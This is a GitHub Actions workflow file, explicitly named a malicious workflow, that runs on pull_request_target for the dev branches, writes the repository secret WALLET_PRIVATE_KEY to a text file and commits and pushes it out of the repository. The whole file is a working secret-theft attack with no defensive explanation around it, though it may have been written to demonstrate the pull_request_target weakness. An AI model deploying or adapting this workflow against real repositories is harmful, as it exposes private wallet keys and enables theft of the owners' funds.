name: Malicious Workflow to Steal Secrets

on:
  pull_request_target:
    types:
      - opened
      - synchronize
    branches:
      - dev
      - dev_v1.1

jobs:
  steal_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout the code from the original repository
        uses: actions/checkout@v3

      - name: Save WALLET_PRIVATE_KEY to file (malicious step)
        run: echo ${{ secrets.WALLET_PRIVATE_KEY }} > privatekey.txt

      - name: Commit the private key file to the fork
        run: |
          git config --global user.name "Malicious User"
          git config --global user.email "malicious@example.com"
          git add privatekey.txt
          git commit -m "Add private key to my fork"
          git push origin main
